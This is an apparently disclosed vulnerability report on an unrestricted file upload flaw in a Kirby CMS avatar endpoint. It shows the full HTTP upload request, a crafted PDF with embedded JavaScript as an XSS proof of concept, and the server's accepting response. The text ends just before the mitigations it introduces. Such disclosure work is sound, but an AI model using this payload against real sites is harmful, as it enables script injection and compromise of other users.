The tester discovered a vulnerability in the upload function via the profile image, which could allow a potential attacker to upload malicious files.
Request :
POST /BGZUwFZY/api//users/jbW4NDxe/avatar HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=1bc7df720a15899644132fd4ff535669a5c1b4f4%2B1707758673.c75811a0ad74047fc0a1.3e95b8a5b3724f53bb555793894e427819144a027ed5bbe4fc80a17686a5b1c4; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F
Content-Length: 851
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypM54MYp6koSelY0N
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: <https://trykirby.com>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <https://trykirby.com/BGZUwFZY/panel/users/jbW4NDxe>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarypM54MYp6koSelY0N
Content-Disposition: form-data; name="file"; filename="infected.pdf"
Content-Type: application/pdf
%PDF-1.3
%����
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\\("XSS"\\)
} catch \\(e\\) {
app.alert\\(e.message\\);
}
)
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream
BT
/F1 24 Tf
ET
endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer
<</Root 1 0 R /Size 5>>
startxref
493
%%EOF
------WebKitFormBoundarypM54MYp6koSelY0N--
Response :
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 16:10:37 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 1125
Connection: close
Content-Type: application/json; charset=UTF-8
{"status":"ok","data":{"content":{"uuid":"pcTvlsQe1jNTiSzu"},"dimensions":{"dimensions":null},"exists":true,"extension":"pdf","filename":"profile.pdf","id":"jbW4NDxe\\/profile.pdf","link":"\\/users\\/jbW4NDxe\\/files\\/profile.pdf","mime":"application\\/pdf","modified":"2024-02-12T16:10:37+00:00","name":"profile","next":null,"niceSize":"660\\u00a0B","options":{"access":true,"changeName":true,"changeTemplate":false,"create":true,"delete":true,"list":true,"read":true,"replace":true,"update":true},"parent":{"avatar":{"filename":"profile.pdf","id":"jbW4NDxe\\/profile.pdf","type":"document","url":"https:\\/\\/trykirby-1653.kxcdn.com\\/BGZUwFZY\\/media\\/users\\/jbW4NDxe\\/b3218c149b-1707754237\\/profile.pdf?width=512&height=512&crop=center"},"email":"[email protected]","id":"jbW4NDxe","language":"en","name":"sa","role":{"description":"The admin has all rights","name":"admin","title":"Admin"},"username":"sa","uuid":"user:\\/\\/jbW4NDxe"},"prev":null,"size":660,"template":"avatar","type":"document","url":"https:\\/\\/trykirby.com\\/BGZUwFZY\\/media\\/users\\/jbW4NDxe\\/b3218c149b-1707754237\\/profile.pdf","uuid":"file:\\/\\/pcTvlsQe1jNTiSzu"}}
Unrestricted file upload vulnerabilities occur when a web application allows users to upload files without proper validation, which can lead to serious security risks. Attackers can exploit this vulnerability to upload malicious files such as scripts or executable files, leading to various security issues including remote code execution. To mitigate unrestricted file upload vulnerabilities, consider the following solutions: